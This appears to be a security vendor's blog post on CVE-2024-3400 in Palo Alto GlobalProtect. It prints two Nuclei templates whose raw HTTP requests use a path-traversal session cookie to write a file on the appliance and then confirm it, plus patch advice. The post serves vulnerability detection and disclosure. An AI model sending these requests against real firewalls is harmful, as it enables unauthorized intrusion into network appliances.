Gal Nagli
CEO
Palo Alto has publicly disclosed last week that various versions of their on-prem firewall appliance are vulnerable to CVE-2024-3400 which could lead to Remote Code Execution and has CVSS score of 10.0
Detection and Exploitation
Shockwave were able to create detection templates using Nuclei's YAML rules and to successfully exploit the vulnerability by following public PoC's that were published on the internet, initially at this blog
We have shared our detection template on our dedicated Github Repository for Attack Surface CVE Threats:
Proof of Concept
The POC is divided to 2 parts, first - we create our arbitrary file on the server with the initial nuclei template or the following HTTP Request, it will create "shockwave.txt" file within global-protect/portal/images publicly accessible path
id: CVE-2024-3400
info:
name: GlobalProtect - OS Command Injection
author: shockwave
severity: critical
reference:
- https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://github.com/k4nfr3/nmap-scripts
- https://github.com/0x0d3ad/CVE-2024-3400
- https://github.com/FoxyProxys/CVE-2024-3400
- https://github.com/MrR0b0t19/CVE-2024-3400
- https://nvd.nist.gov/vuln/detail/CVE-2024-3400
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-3400
cwe-id: CWE-77
epss-score: 0.00371
epss-percentile: 0.72356
cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="-631559155"
product: pan-os
vendor: paloaltonetworks
tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev
http:
- raw:
- |
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: {{Hostname}}
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/shockwave.txt;
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- "GlobalProtect Portal"
The 2nd step is to query the created file, if we receive 403 on the specific path, it confirms the file creation, otherwise - the appliance is patched.
id: CVE-2024-3400
info:
name: GlobalProtect - OS Command Injection
author: pdresearch,parthmalhotra
severity: critical
reference:
- https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://github.com/k4nfr3/nmap-scripts
- https://github.com/0x0d3ad/CVE-2024-3400
- https://github.com/FoxyProxys/CVE-2024-3400
- https://github.com/MrR0b0t19/CVE-2024-3400
- https://nvd.nist.gov/vuln/detail/CVE-2024-3400
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-3400
cwe-id: CWE-77
epss-score: 0.00371
epss-percentile: 0.72356
cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="-631559155"
product: pan-os
vendor: paloaltonetworks
tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev
http:
- raw:
- |
GET /global-protect/portal/images/shockwave.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 403
It will look like the following:
Vulnerable Instance:
Fixed Instance:
Remediation
Update your Palo Alto Firewalls to the latest version using the suggested patches at https://security.paloaltonetworks.com/CVE-2024-3400
References
- https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://github.com/k4nfr3/nmap-scripts
- https://github.com/0x0d3ad/CVE-2024-3400
- https://github.com/FoxyProxys/CVE-2024-3400
- https://github.com/MrR0b0t19/CVE-2024-3400
- https://nvd.nist.gov/vuln/detail/CVE-2024-3400
Closing Words
As always, our customers are the first to know on emerging threats, as proof of our testimony we were also able to be the first to report to various Bug Bounty Programs and help more entities protect their Attack Surface, we have alerted about this particular threat 1 week before public PoC was available.
https://www.linkedin.com/feed/update/urn:li:activity:7184496382420910080/